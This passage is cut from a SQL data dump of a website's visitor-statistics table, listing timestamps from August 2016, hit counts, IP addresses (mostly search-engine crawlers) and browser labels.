0,'40.77.167.38','other'),(57635,1471695860,1,0,1,0,'66.249.76.60',''),(57636,1471695989,1,0,1,0,'66.249.66.84',''),(57637,1471696287,5,5,0,0,'78.46.50.246','other'),(57638,1471696969,1,0,1,0,'66.249.76.62',''),(57639,1471697421,1,1,0,0,'180.76.15.6','other'),(57640,1471698069,1,1,0,0,'91.196.178.38','firefox'),(57641,1471698093,1,1,0,0,'92.113.189.52','firefox'),(57642,1471698541,1,1,0,0,'90.27.178.65','firefox'),(57643,1471699050,2,2,0,0,'130.193.50.34','other'),(57644,1471699239,1,0,1,0,'66.249.76.62',''),(57645,1471699431,1,1,0,0,'157.55.39.112','other'),(57646,1471700044,2,0,2,0,'66.249.76.61',''),(57647,1471700059,11,0,11,0,'66.249.76.60',''),(57648,1471700252,1,0,1,0,'66.249.76.62',''),(57649,1471700262,1,0,1,0,'66.249.66.84',''),(57650,1471700321,5,0,5,0,'66.249.66.81',''),(57651,1471701436,2,2,0,0,'130.193.50.34','other'),(57652,1471701437,2,2,0,0,'130.193.51.19','other'),(57653,1471701653,1,0,1,0,'66.249.66.84',''),(57654,1471701661,1,0,1,0,'66.249.76.61',''),(57655,1471701665,1,0,1,0,'66.249.66.81',''),(57656,1471701676,12,0,12,0,'66.249.76.60',''),(57657,1471702898,1,0,1,0,'66.249.76.79',''),(57658,1471703596,1,0,1,0,'66.249.66.81',''),(57659,1471705323,1,0,1,0,'66.249.76.62',''),(57660,1471705891,1,1,0,0,'91.196.178.33','chrome'),(57661,1471706225,1,0,1,0,'66.249.66.81',''),(57662,1471707132,1,0,1,0,'66.249.76.77',''),(57663,1471707508,1,1,0,0,'141.8.183.25','other'),(57664,1471707510,1,1,0,0,'93.158.152.84','other'),(57665,1471709582,1,0,1,0,'66.249.76.61',''),(57666,1471710026,2,2,0,0,'141.8.183.25','other'),(57667,1471710730,1,1,0,0,'141.8.142.67','other'),(57668,1471712905,1,1,0,0,'91.196.178.33','chrome'),(57669,1471712989,1,1,0,0,'141.8.132.10','other'),(57670,1471713012,1,1,0,0,'93.158.152.61','other'),(57671,1471713126,1,1,0,0,'91.244.12.84','chrome'),(57672,1471713819,4,4,0,0,'141.8.183.25','other'),(57673,1471713953,1,1,0,0,'141.8.142.67','other'),(57674,1471714101,1,1,0,0,'130.193.51.79','other'),(57675,1471715189,1,0,1,0,'66.249.76.61',''),(57676,1471716307,1,0,1,0,'66.249.66.84',''),(57677,1471716483,4,4,0,0,'130.193.50.34','other'),(57678,1471716822,1,1,0,0,'130.193.51.79','other'),(57679,1471717033,1,1,0,0,'141.8.142.58','other'),(57680,1471717465,1,1,0,0,'130.193.50.34','other'),(57681,1471718078,1,1,0,0,'82.145.223.32','other'),(57682,1471718260,1,1,0,0,'40.77.167.38','other'),(57683,1471718385,1,1,0,0,'94.179.97.52','chrome'),(57684,1471718440,1,0,1,0,'66.249.76.60',''),(57685,1471719046,1,1,0,0,'141.0.13.246','other'),(57686,1471720293,1,0,1,0,'66.249.76.81',''),(57687,1471721704,1,1,0,0,'5.255.253.10','other'),(57688,1471721705,1,1,0,0,'141.8.132.10','other'),(57689,1471722391,1,1,0,0,'141.8.183.25','other'),(57690,1471722628,1,1,0,0,'91.196.178.133','other'),(57691,1471722727,3,3,0,0,'130.193.50.34','other'),(57692,1471722728,1,1,0,0,'130.193.51.19','other'),(57693,1471723733,1,0,1,0,'66.249.76.62',''),(57694,1471723796,1,1,0,0,'141.8.183.25','other'),(57695,1471723924,1,1,0,0,'141.8.142.58','other'),(57696,1471724971,1,1,0,0,'130.193.51.19','other'),(57697,1471724972,1,1,0,0,'130.193.50.34','other'),(57698,1471725190,1,0,1,0,'66.249.76.61',''),(57699,1471726628,1,1,0,0,'141.8.132.10','other'),(57700,1471726808,2,2,0,0,'130.193.51.19','other'),(57701,1471727317,1,1,0,0,'130.193.50.34','other'),(57702,1471728130,2,0,2,0,'66.249.76.60',''),(57703,1471729814,1,1,0,0,'130.193.50.34','other'),(57704,1471730057,1,1,0,0,'130.193.51.19','other'),(57705,1471730060,1,1,0,0,'141.8.142.67','other'),(57706,1471731064,1,1,0,0,'207.46.13.131','other'),(57707,1471732153,1,1,0,0,'141.8.183.25','other'),(57708,1471732154,1,1,0,0,'130.193.50.34','other'),(57709,1471732710,1,0,1,0,'66.249.76.61',''),(57710,1471732821,1,1,0,0,'130.193.50.32','other'),(57711,1471733600,1,1,0,0,'130.193.51.19','other'),(57712,1471736486,2,1,1,0,'66.249.76.62',''),(57713,1471736988,1,1,0,0,'207.46.13.131','other'),(57714,1471737995,1,1,0,0,'130.193.50.34','other'),(57715,1471738281,2,0,2,0,'66.249.76.79',''),(57716,1471738982,1,1,0,0,'157.55.39.112','other'),(57717,1471740157,1,1,0,0,'141.8.142.58','other'),(57718,1471741977,1,1,0,0,'141.8.183.25','other'),(57719,1471742850,1,0,1,0,'66.249.76.61',''),(57720,1471743687,1,1,0,0,'180.76.15.136','other'),(57721,1471745264,1,1,0,0,'66.249.66.183','chrome'),(57722,1471745697,1,1,0,0,'180.76.15.33','other'),(57723,1471745976,1,1,0,0,'69.30.198.242','other'),(57724,1471746283,2,2,0,0,'130.193.50.34','other'),(57725,1471746299,1,1,0,0,'66.249.76.61','chrome'),(57726,1471746680,2,2,0,0,'51.255.48.153','other'),(57727,1471747216,1,1,0,0,'178.154.189.37','other'),(57728,1471747219,1,1,0,0,'5.255.253.9','other'),(57729,1471748581,2,0,2,0,'66.249.76.60',''),(57730,1471748997,1,1,0,0,'66.249.76.77','chrome'),(57731,1471751163,1,1,0,0,'130.193.51.74','other'),(57732,1471751165,1,1,0,0,'130.193.51.81','other'),(57733,1471751318,1,1,0,0,'130.193.37.7','other'),(57734,1471751376,1,1,0,0,'5.255.253.68','other'),(57735,1471751444,1,1,0,0,'62.210.250.212','other'),(57736,1471751524,1,1,0,0,'178.154.189.31','other'),(57737,1471751686,1,1,0,0,'207.46.13.9','other'),(57738,1471751794,1,1,0,0,'178.154.149.11','other'),(57739,1471751795,1,1,0,0,'130.193.51.79','other'),(57740,1471752918,2,2,0,0,'69.30.198.178','other'),(57741,1471753533,1,1,0,0,'157.55.39.112','other'),(57742,1471753629,1,1,0,0,'130.193.50.34','other'),(57743,1471754723,1,1,0,0,'130.193.50.34','other'),(57744,1471754768,1,1,0,0,'157.55.39.112','other'),(57745,1471755242,1,1,0,0,'188.239.32.177','chrome'),(57746,1471755935,1,1,0,0,'93.158.152.40','other'),(57747,1471755936,1,1,0,0,'178.154.149.10','other'),(57748,1471755982,1,1,0,0,'180.76.15.142','other'),(57749,1471756544,2,0,2,0,'66.249.76.60',''),(57750,1471756987,1,1,0,0,'93.158.152.61','other'),(57751,1471756991,1,1,0,0,'130.193.37.21','other'),(57752,1471757303,1,1,0,0,'141.8.142.10','other'),(57753,1471757326,1,1,0,0,'130.193.50.32','other'),(57754,1471757769,1,1,0,0,'141.8.183.25','other'),(57755,1471758115,1,0,1,0,'66.249.76.81',''),(57756,1471758764,1,1,0,0,'157.55.39.112','other'),(57757,1471760369,1,0,1,0,'66.249.76.62',''),(57758,1471760419,1,1,0,0,'176.193.179.8','other'),(57759,1471760461,1,1,0,0,'91.244.12.84','chrome'),(57760,1471763014,1,1,0,0,'78.111.185.98','chrome'),(57761,1471763202,1,0,1,0,'66.249.76.60',''),(57762,1471763664,1,1,0,0,'130.193.50.34','other'),(57763,1471763665,1,1,0,0,'178.154.189.37','other'),(57764,1471764601,1,0,1,0,'66.249.76.62',''),(57765,1471764611,1,1,0,0,'180.76.15.33','other'),(57766,1471765521,4,4,0,0,'51.254.97.192','other'),(57767,1471765809,1,1,0,0,'207.46.13.9','other'),(57768,1471766985,1,1,0,0,'94.179.253.116','chrome'),(57769,1471767001,1,1,0,0,'207.46.13.131','other'),(57770,1471767111,1,0,1,0,'66.249.76.61',''),(57771,1471769888,1,1,0,0,'66.249.83.250','chrome'),(57772,1471771049,10,10,0,0,'69.58.178.57','firefox'),(57773,1471772849,1,0,1,0,'66.249.76.62',''),(57774,1471773256,2,2,0,0,'193.111.140.153','other'),(57775,1471773979,2,2,0,0,'130.193.50.34','other'),(57776,1471774106,1,0,1,0,'66.249.76.62',''),(57777,1471775755,1,1,0,0,'91.196.178.38','firefox'),(57778,1471775954,2,2,0,0,'130.193.50.34','other'),(57779,1471778434,2,2,0,0,'178.137.160.45','other'),(57780,1471779277,1,0,1,0,'66.249.76.77',''),(57781,1471780426,1,1,0,0,'130.193.50.34','other'),(57782,1471780428,1,1,0,0,'141.8.183.25','other'),(57783,1471780768,2,0,2,0,'68.180.230.111',''),(57784,1471781567,1,1,0,0,'40.77.167.38','other'),(57785,1471782147,1,1,0,0,'130.193.50.6','other'),(57786,1471782149,1,1,0,0,'5.255.253.67','other'),(57787,1471782161,1,0,1,0,'66.249.76.61',''),(57788,1471782410,1,0,1,0,'66.249.76.62',''),(57789,1471782977,1,0,1,0,'66.249.76.60',''),(57790,1471784847,1,1,0,0,'207.46.13.131','other'),(57791,1471785018,1,1,0,0,'91.196.178.33','chrome'),(57792,1471785729,1,0,1,0,'66.249.76.61',''),(57793,1471786061,1,1,0,0,'91.196.178.33','chrome'),(57794,1471786220,1,1,0,0,'130.193.50.34','other'),(57795,1471786222,1,1,0,0,'141.8.183.25','other'),(57796,1471786970,1,1,0,0,'91.196.178.33','chrome'),(57797,1471787866,1,1,0,0,'130.193.50.34','other'),(57798,1471787870,1,1,0,0,'141.8.142.58','other'),(57799,1471788511,1,1,0,0,'5.255.253.68','other'),(57800,1471788512,1,1,0,0,'141.8.183.25','other'),(57801,1471788602,1,1,0,0,'91.196.178.33','chrome'),(57802,1471788953,2,2,0,0,'130.193.50.34','other'),(57803,1471789318,1,1,0,0,'207.46.13.131','other'),(57804,1471789505,1,1,0,0,'91.196.178.33','chrome'),(57805,1471791502,2,1,1,0,'66.249.66.81',''),(57806,1471792897,2,0,2,0,'66.249.76.62',''),(57807,1471792989,1,0,1,0,'66.249.76.60',''),(57808,1471793224,1,1,0,0,'94.179.109.115','firefox'),(57809,1471793999,1,0,1,0,'66.249.76.60',''),(57810,1471794141,1,1,0,0,'99.99.253.228','other'),(57811,1471794148,2,2,0,0,'141.8.183.25','other'),(57812,1471795605,1,1,0,0,'130.193.50.34','other'),(57813,1471795607,1,1,0,0,'130.193.51.19','other'),(57814,1471795796,1,1,0,0,'180.76.15.157','other'),(57815,1471798661,1,1,0,0,'149.202.48.246','other'),(57816,1471799931,1,1,0,0,'141.8.183.25','other'),(57817,1471799932,1,1,0,0,'130.193.50.34','other'),(57818,1471800672,1,1,0,0,'207.46.13.51','other'),(57819,1471801029,1,1,0,0,'141.8.183.25','other'),(57820,1471801033,2,2,0,0,'130.193.50.34','other'),(57821,1471803103,2,2,0,0,'130.193.51.19','other'),(57822,1471803332,1,0,1,0,'66.249.76.62',''),(57823,1471803498,4,0,4,0,'66.249.76.60',''),(57824,1471803609,2,0,2,0,'66.249.76.61',''),(57825,1471803653,3,0,3,0,'66.249.76.79',''),(57826,1471804939,1,0,1,0,'66.249.76.79',''),(57827,1471805654,1,0,1,0,'66.249.76.77',''),(57828,1471806798,1,0,1,0,'66.249.76.60',''),(57829,1471806850,1,1,0,0,'91.196.178.100','chrome'),(57830,1471807569,1,1,0,0,'178.94.172.95','chrome'),(57831,1471808131,70,70,0,0,'51.254.130.58','other'),(57832,1471808199,1,1,0,0,'207.46.13.131','other'),(57833,1471808747,1,0,1,0,'66.249.76.60',''),(57834,1471809155,300,300,0,0,'144.76.29.66','other'),(57835,1471809318,1,1,0,0,'91.196.178.135','firefox'),(57836,1471809407,1,0,1,0,'66.249.76.62',''),(57837,1471810234,1,1,0,0,'91.196.178.135','firefox'),(57838,1471811084,2,2,0,0,'178.137.160.45','other'),(57839,1471811434,1,1,0,0,'130.193.50.34','other'),(57841,1471813587,1,1,0,0,'130.193.51.14','other'),(57842,1471814002,1,1,0,0,'180.76.15.147','other'),(57843,1471814742,1,1,0,0,'178.154.149.10','other'),(57844,1471814768,1,1,0,0,'141.8.132.10','other'),(57845,1471816234,1,1,0,0,'141.8.142.85','other'),(57846,1471816235,1,1,0,0,'5.255.253.68','other'),(57847,1471816239,1,1,0,0,'141.8.142.88','other'),(57848,1471816491,1,1,0,0,'141.8.184.22','other'),(57849,1471816492,1,1,0,0,'130.193.37.27','other'),(57850,1471817034,1,1,0,0,'141.8.142.8','other'),(57851,1471817035,1,1,0,0,'130.193.51.19','other'),(57852,1471821683,1,0,1,0,'66.249.76.60',''),(57853,1471822044,1,1,0,0,'130.193.51.14','other'),(57854,1471822046,1,1,0,0,'178.154.189.31','other'),(57855,1471822994,1,1,0,0,'141.8.132.30','other'),(57856,1471824183,1,0,1,0,'66.249.76.62',''),(57857,1471824247,2,0,2,0,'66.249.76.79',''),(57858,1471824375,1,1,0,0,'40.77.167.38','other'),(57859,1471826566,1,1,0,0,'130.193.51.19','other'),(57860,1471826567,1,1,0,0,'93.158.152.40','other'),(57861,1471827705,1,1,0,0,'130.193.50.38','other'),(57862,1471827708,1,1,0,0,'141.8.132.41','other'),(57863,1471827712,1,1,0,0,'141.8.142.41','other'),(57864,1471828057,1,0,1,0,'66.249.76.60',''),(57865,1471829623,1,0,1,0,'66.249.76.61',''),(57866,1471830195,1,0,1,0,'66.249.76.62',''),(57867,1471831315,1,1,0,0,'130.193.50.34','other'),(57868,1471831316,1,1,0,0,'141.8.183.25','other'),(57869,1471831668,1,1,0,0,'157.55.39.36','other'),(57870,1471832983,1,1,0,0,'76.189.199.33','firefox'),(57871,1471833306,1,1,0,0,'141.8.183.25','other'),(57872,1471833860,1,0,1,0,'66.249.76.61',''),(57873,1471834043,2,2,0,0,'130.193.50.34','other'),(57874,1471834345,1,1,0,0,'207.46.13.9','other'),(57875,1471835271,2,2,0,0,'141.8.183.25','other'),(57876,1471835852,1,0,1,0,'66.249.76.62',''),(57877,1471836517,1,1,0,0,'66.249.76.81','chrome'),(57878,1471836909,1,0,1,0,'66.249.76.62',''),(57879,1471837319,10,10,0,0,'195.154.187.115','other'),(57880,1471837693,2,2,0,0,'130.193.50.34','other'),(57881,1471839827,1,1,0,0,'91.244.12.84','chrome'),(57882,1471840819,1,1,0,0,'130.193.50.34','other'),(57883,1471840820,1,1,0,0,'141.8.183.25','other'),(57884,1471841807,1,1,0,0,'91.196.178.103','chrome'),(57885,1471841835,1,1,0,0,'130.193.50.34','other'),(57886,1471842184,1,0,1,0,'66.249.76.47',''),(57887,1471843601,1,0,1,0,'66.249.76.45',''),(57888,1471843763,1,1,0,0,'91.196.178.48','chrome'),(57889,1471843863,1,1,0,0,'141.8.142.58','other'),(57890,1471843882,1,1,0,0,'130.193.51.19','other'),(57891,1471844700,1,1,0,0,'178.154.189.37','other'),(57892,1471844789,1,1,0,0,'130.180.220.51','chrome'),(57893,1471844841,1,0,1,0,'66.249.76.45',''),(57894,1471844880,1,1,0,0,'141.8.142.62','other'),(57895,1471845144,1,1,0,0,'141.8.183.25','other'),(57896,1471845828,1,0,1,0,'66.249.76.59',''),(57897,1471845964,1,1,0,0,'66.102.9.83','chrome'),(57898,1471846345,1,1,0,0,'91.196.178.68','firefox'),(57899,1471848221,1,1,0,0,'91.196.177.26','firefox'),(57900,1471848380,1,1,0,0,'80.64.92.44','chrome'),(57901,1471849349,1,1,0,0,'91.196.178.71','firefox'),(57902,1471849639,3,3,0,0,'130.193.50.34','other'),(57903,1471849640,3,3,0,0,'141.8.183.25','other'),(57904,1471849651,1,0,1,0,'66.249.76.60',''),(57905,1471850100,1,1,0,0,'157.55.39.36','other'),(57906,1471850567,1,1,0,0,'66.249.93.109','chrome'),(57907,1471851151,1,1,0,0,'91.196.178.70','firefox'),(57908,1471851990,1,0,1,0,'66.249.76.60',''),(57909,1471852253,1,1,0,0,'91.196.178.134','firefox'),(57910,1471852296,2,2,0,0,'130.193.50.34','other'),(57911,1471852355,1,1,0,0,'91.196.178.70','firefox'),(57912,1471852610,1,0,1,0,'66.249.76.79',''),(57913,1471852889,1,1,0,0,'40.77.167.38','other'),(57914,1471854407,1,0,1,0,'66.249.76.59',''),(57915,1471854723,1,1,0,0,'91.196.178.70','firefox'),(57916,1471855083,1,0,1,0,'66.249.66.87',''),(57917,1471855367,2,2,0,0,'130.193.50.34','other'),(57918,1471856601,1,1,0,0,'5.255.253.67','other'),(57919,1471856602,1,1,0,0,'93.158.152.61','other'),(57920,1471856606,1,1,0,0,'141.8.142.58','other'),(57921,1471856840,1,0,1,0,'68.180.230.111',''),(57922,1471857149,1,0,1,0,'66.249.76.59',''),(57923,1471857881,1,0,1,0,'66.249.76.77',''),(57924,1471858215,1,0,1,0,'66.249.76.79',''),(57925,1471858580,1,1,0,0,'180.76.15.22','other'),(57926,1471858925,1,1,0,0,'31.41.70.12','opera'),(57927,1471859459,1,0,1,0,'66.249.76.59',''),(57928,1471859550,1,1,0,0,'91.196.178.135','chrome'),(57929,1471860412,2,2,0,0,'46.4.120.3','other'),(57930,1471860579,1,1,0,0,'40.77.167.38','other'),(57931,1471860768,2,2,0,0,'89.163.148.22','other'),(57932,1471860824,2,2,0,0,'130.193.50.34','other'),(57933,1471860907,66,66,0,0,'192.166.219.136','other'),(57934,1471861078,1,0,1,0,'66.249.76.59',''),(57935,1471861284,2,2,0,0,'130.193.51.19','other'),(57936,1471861612,1,0,1,0,'66.249.76.61',''),(57937,1471862575,1,1,0,0,'94.179.34.65','firefox'),(57938,1471863159,3,3,0,0,'141.8.183.25','other'),(57939,1471863287,7,7,0,0,'130.193.50.34','other'),(57940,1471863610,1,0,1,0,'66.249.66.177',''),(57941,1471863690,1,1,0,0,'130.193.51.19','other'),(57942,1471864071,1,1,0,0,'94.74.74.2','chrome'),(57943,1471864083,1,0,1,0,'66.249.76.61',''),(57944,1471864215,1,1,0,0,'130.193.50.34','other'),(57945,1471868166,1,1,0,0,'37.53.230.228','firefox'),(57946,1471868298,6,6,0,0,'130.193.50.34','other'),(57947,1471869303,1,0,1,0,'66.249.76.59',''),(57948,1471869700,2,2,0,0,'5.9.151.22','other'),(57949,1471869733,1,1,0,0,'91.224.68.178','firefox'),(57950,1471869785,1,1,0,0,'176.111.33.18','firefox'),(57951,1471869797,1,1,0,0,'130.193.50.34','other'),(57952,1471869970,2,2,0,0,'37.53.230.228','firefox'),(57953,1471870594,1,1,0,0,'37.54.19.3','firefox'),(57954,1471871412,1,1,0,0,'207.46.13.131','other'),(57955,1471871682,1,0,1,0,'66.249.76.60',''),(57956,1471871914,1,1,0,0,'37.53.230.228','firefox'),(57957,1471872149,1,1,0,0,'37.54.19.3','firefox'),(57958,1471872261,1,1,0,0,'130.193.50.34','other'),(57959,1471872262,1,1,0,0,'141.8.142.58','other'),(57960,1471872528,1,1,0,0,'66.249.93.109','chrome'),(57961,1471872667,1,1,0,0,'91.196.178.69','other'),(57962,1471872708,2,0,2,0,'66.249.76.60',''),(57963,1471872852,1,1,0,0,'141.8.183.25','other'),(57964,1471873157,1,1,0,0,'37.53.230.228','firefox'),(57965,1471873218,1,1,0,0,'91.196.178.168','chrome'),(57966,1471873512,1,0,1,0,'66.249.76.77',''),(57967,1471874268,1,1,0,0,'37.53.122.15','chrome'),(57968,1471874294,1,1,0,0,'37.53.230.228','firefox'),(57969,1471874752,1,0,1,0,'66.249.66.177',''),(57970,1471874759,1,1,0,0,'37.54.19.3','firefox'),(57971,1471874992,1,0,1,0,'66.249.76.77',''),(57972,1471875065,1,0,1,0,'66.249.76.59',''),(57973,1471875149,2,2,0,0,'130.193.50.34','other'),(57974,1471876224,2,2,0,0,'37.53.122.15','chrome'),(57975,1471876490,1,0,1,0,'66.249.76.81',''),(57976,1471876862,1,1,0,0,'141.8.183.25','other'),(57977,1471876978,1,1,0,0,'37.139.166.199','chrome'),(57978,1471877136,1,1,0,0,'37.53.122.15','chrome'),(57979,1471877212,1,0,1,0,'66.249.76.79',''),(57980,1471878249,1,1,0,0,'49.50.67.240','firefox'),(57981,1471878512,1,0,1,0,'66.249.76.81',''),(57982,1471879290,1,1,0,0,'180.76.15.14','other'),(57983,1471879863,1,0,1,0,'66.249.76.81',''),(57984,1471879986,1,0,1,0,'66.249.66.81',''),(57985,1471881011,10,10,0,0,'69.197.177.26','other'),(57986,1471881852,1,1,0,0,'40.77.167.38','other'),(57987,1471882084,1,0,1,0,'66.249.76.59',''),(57988,1471882183,1,1,0,0,'207.46.13.131','other'),(57989,1471882218,1,1,0,0,'141.8.183.25','other'),(57990,1471882219,1,1,0,0,'130.193.50.34','other'),(57991,1471884113,1,0,1,0,'66.249.76.59',''),(57992,1471884133,1,0,1,0,'66.249.76.61',''),(57993,1471884892,3,3,0,0,'141.8.183.25','other'),(57994,1471885904,1,1,0,0,'130.193.50.34','other'),(57995,1471886158,1,1,0,0,'207.46.13.131','other'),(57996,1471887098,1,0,1,0,'68.180.230.178',''),(57997,1471887745,1,1,0,0,'141.8.183.25','other'),(57998,1471887746,2,2,0,0,'130.193.50.34','other'),(57999,1471887918,1,0,1,0,'66.249.76.61',''),(58000,1471887961,1,0,1,0,'66.249.66.177',''),(58001,1471888343,1,1,0,0,'130.193.51.19','other'),(58002,1471889426,1,1,0,0,'130.193.50.34','other'),(58003,1471889428,1,1,0,0,'141.8.183.25','other'),(58004,1471889859,1,1,0,0,'141.8.132.47','other'),(58005,1471889861,1,1,0,0,'5.255.253.23','other'),(58006,1471891477,1,1,0,0,'130.193.50.34','other'),(58007,1471891478,1,1,0,0,'141.8.183.25','other'),(58008,1471891956,1,1,0,0,'91.196.178.103','chrome'),(58009,1471891973,1,0,1,0,'66.249.76.81',''),(58010,1471892060,1,1,0,0,'157.55.39.36','other'),(58011,1471893702,1,0,1,0,'66.249.76.59',''),(58012,1471893858,1,1,0,0,'37.54.19.3','firefox'),(58013,1471893992,1,1,0,0,'178.93.148.71','chrome'),(58014,1471894146,1,1,0,0,'141.0.13.15','other'),(58015,1471894152,2,2,0,0,'130.193.50.34','other'),(58016,1471894153,2,2,0,0,'141.8.183.25','other'),(58017,1471895332,1,1,0,0,'46.73.193.0','opera'),(58018,1471895333,1,1,0,0,'46.73.232.80','opera'),(58019,1471895334,1,1,0,0,'128.68.201.248','chrome'),(58020,1471897323,1,1,0,0,'5.255.198.86','other'),(58021,1471897490,1,1,0,0,'66.249.76.60','chrome'),(58022,1471899031,1,1,0,0,'107.21.1.8','other'),(58023,1471899470,2,2,0,0,'130.193.50.34','other'),(58024,1471899471,2,2,0,0,'130.193.51.19','other'),(58025,1471900106,1,1,0,0,'141.0.12.20','other'),(58026,1471900784,1,1,0,0,'5.1.1.174','chrome'),(58027,1471903179,1,1,0,0,'66.249.76.59','chrome'),(58028,1471903689,4,4,0,0,'141.8.183.25','other'),(58029,1471905905,1,1,0,0,'180.76.15.5','other'),(58030,1471907671,2,2,0,0,'141.8.142.58','other'),(58031,1471908125,6,0,6,0,'66.249.76.59',''),(58032,1471908185,2,0,2,0,'66.249.76.61',''),(58033,1471908351,1,0,1,0,'66.249.76.60',''),(58034,1471908390,2,0,2,0,'66.249.76.58',''),(58035,1471908469,1,0,1,0,'66.249.66.81',''),(58036,1471909840,1,1,0,0,'5.255.253.55','other'),(58037,1471909844,1,1,0,0,'141.8.183.25','other'),(58038,1471910029,2,0,2,0,'66.249.76.60',''),(58039,1471910075,2,0,2,0,'66.249.76.61',''),(58040,1471910201,2,0,2,0,'66.249.76.59',''),(58041,1471910644,1,1,0,0,'77.37.221.1','msie'),(58042,1471911767,1,0,1,0,'66.249.76.60',''),(58043,1471911884,1,1,0,0,'217.69.133.232','other'),(58044,1471912159,1,0,1,0,'66.249.76.59',''),(58045,1471912368,1,0,1,0,'66.249.76.79',''),(58046,1471913610,1,1,0,0,'130.193.51.81','other'),(58048,1471913843,1,0,1,0,'66.249.76.59',''),(58049,1471914602,1,0,1,0,'66.249.76.61',''),(58050,1471915117,1,1,0,0,'141.8.183.25','other'),(58051,1471915121,4,4,0,0,'130.193.50.34','other'),(58052,1471919707,1,1,0,0,'66.249.76.79','chrome'),(58053,1471919949,1,1,0,0,'207.46.13.131','other'),(58054,1471921129,1,0,1,0,'66.249.76.81',''),(58055,1471922562,1,0,1,0,'66.249.76.81',''),(58056,1471926586,2,2,0,0,'130.193.50.34','other'),(58057,1471927812,1,1,0,0,'95.134.184.126','chrome'),(58058,1471928412,1,0,1,0,'66.249.76.77',''),(58059,1471928545,1,1,0,0,'66.102.9.93','chrome'),(58060,1471928967,1,1,0,0,'94.179.18.222','firefox'),(58061,1471929449,1,0,1,0,'66.249.66.183',''),(58062,1471929603,4,4,0,0,'92.112.22.242','chrome'),(58063,1471930699,2,2,0,0,'141.8.183.25','other'),(58064,1471930848,1,1,0,0,'40.77.167.38','other'),(58065,1471930960,2,2,0,0,'130.193.50.34','other'),(58066,1471931003,1,0,1,0,'66.249.66.183',''),(58067,1471931011,1,0,1,0,'66.249.76.60',''),(58068,1471931206,2,0,2,0,'66.249.76.59',''),(58069,1471931574,1,0,1,0,'66.249.76.81',''),(58070,1471932078,1,1,0,0,'180.76.15.137','other'),(58071,1471932468,1,1,0,0,'91.196.178.70','chrome'),(58072,1471932807,1,1,0,0,'37.54.19.3','firefox'),(58073,1471933758,1,1,0,0,'91.196.177.101','chrome'),(58074,1471933809,1,1,0,0,'141.8.183.25','other'),(58075,1471933893,3,3,0,0,'130.193.50.34','other'),(58076,1471934037,1,1,0,0,'130.193.51.19','other'),(58077,1471934471,1,1,0,0,'91.244.36.135','opera'),(58078,1471934605,1,1,0,0,'66.249.76.81','chrome'),(58079,1471934692,1,1,0,0,'40.77.167.38','other'),(58080,1471934738,1,1,0,0,'37.54.19.3','firefox'),(58081,1471934878,1,1,0,0,'91.196.177.26','firefox'),(58082,1471934884,1,0,1,0,'66.249.66.180',''),(58083,1471935250,2,2,0,0,'46.201.175.99','firefox'),(58084,1471935490,1,0,1,0,'66.249.66.84',''),(58085,1471935495,1,1,0,0,'91.196.178.70','firefox'),(58086,1471935664,1,1,0,0,'91.192.135.241','firefox'),(58087,1471935979,1,1,0,0,'54.196.49.239','other'),(58088,1471936441,1,1,0,0,'82.207.91.234','firefox'),(58089,1471936678,1,1,0,0,'91.196.177.26','firefox'),(58090,1471936789,1,1,0,0,'37.54.19.3','firefox'),(58091,1471937032,2,2,0,0,'141.8.183.25','other'),(58092,1471938251,1,1,0,0,'207.46.13.131','other'),(58093,1471940181,1,1,0,0,'37.52.2.121','firefox'),(58094,1471940788,1,1,0,0,'91.196.178.70','chrome'),(58095,1471941243,1,1,0,0,'66.249.76.59','chrome'),(58096,1471942082,1,1,0,0,'141.8.183.25','other'),(58097,1471942086,1,1,0,0,'130.193.50.34','other'),(58098,1471942421,1,1,0,0,'93.73.234.193','firefox'),(58099,1471942667,1,1,0,0,'37.54.19.3','firefox'),(58100,1471943960,1,1,0,0,'157.55.39.134','other'),(58101,1471944115,1,1,0,0,'91.196.178.69','chrome'),(58102,1471944119,2,2,0,0,'130.193.51.19','other'),(58103,1471944120,2,2,0,0,'130.193.50.34','other'),(58104,1471944174,1,0,1,0,'66.249.76.61',''),(58105,1471944971,1,1,0,0,'141.8.142.67','other'),(58106,1471945356,1,1,0,0,'91.196.178.70','chrome'),(58107,1471945527,1,1,0,0,'46.201.175.99','firefox'),(58108,1471946022,1,1,0,0,'66.249.93.59','chrome'),(58109,1471946484,1,1,0,0,'91.121.181.101','other'),(58110,1471946507,2,2,0,0,'51.254.129.9','other'),(58111,1471947082,1,1,0,0,'91.196.178.163','chrome'),(58112,1471947357,1,1,0,0,'78.111.189.213','chrome'),(58113,1471947401,1,0,1,0,'66.249.76.61',''),(58114,1471947479,2,2,0,0,'130.193.50.34','other'),(58115,1471947755,1,1,0,0,'40.77.167.38','other'),(58116,1471949696,1,0,1,0,'66.249.76.60',''),(58117,1471950426,1,1,0,0,'141.8.142.61','other'),(58118,1471950427,1,1,0,0,'141.8.183.19','other'),(58119,1471952550,1,1,0,0,'46.201.175.99','firefox'),(58120,1471953192,1,0,1,0,'66.249.66.84',''),(58121,1471953193,3,3,0,0,'95.91.45.50','other'),(58122,1471953217,3,0,3,0,'66.249.76.59',''),(58123,1471953417,1,0,1,0,'66.249.76.60',''),(58124,1471953430,1,0,1,0,'66.249.76.61',''),(58125,1471954428,1,0,1,0,'66.249.76.77',''),(58126,1471954897,1,1,0,0,'46.201.175.99','firefox'),(58127,1471956498,1,1,0,0,'91.196.178.34','firefox'),(58128,1471956982,1,0,1,0,'66.249.76.79',''),(58129,1471957134,1,0,1,0,'66.249.76.61',''),(58130,1471959003,1,1,0,0,'46.201.175.64','chrome'),(58131,1471959218,2,2,0,0,'130.193.50.34','other'),(58132,1471959222,1,1,0,0,'141.8.183.25','other'),(58133,1471959229,1,1,0,0,'46.201.175.99','firefox'),(58134,1471959443,1,1,0,0,'91.196.178.103','chrome'),(58135,1471959979,1,0,1,0,'66.249.76.60',''),(58136,1471960070,1,1,0,0,'37.54.19.3','firefox'),(58137,1471960405,1,1,0,0,'130.193.50.34','other'),(58138,1471960406,1,1,0,0,'130.193.51.19','other'),(58139,1471960755,1,1,0,0,'95.158.63.131','chrome'),(58140,1471961783,1,1,0,0,'91.196.178.129','chrome'),(58141,1471962129,1,1,0,0,'49.50.67.240','firefox'),(58142,1471962242,3,3,0,0,'141.8.183.25','other'),(58143,1471962279,2,2,0,0,'130.193.50.34','other'),(58144,1471962849,1,0,1,0,'66.249.76.60',''),(58145,1471963018,1,1,0,0,'212.55.85.158','chrome'),(58146,1471963436,1,1,0,0,'79.137.150.134','firefox'),(58147,1471963989,1,0,1,0,'66.249.76.79',''),(58148,1471964147,1,0,1,0,'66.249.76.60',''),(58149,1471964926,1,1,0,0,'49.50.67.240','firefox'),(58150,1471965309,1,1,0,0,'82.145.221.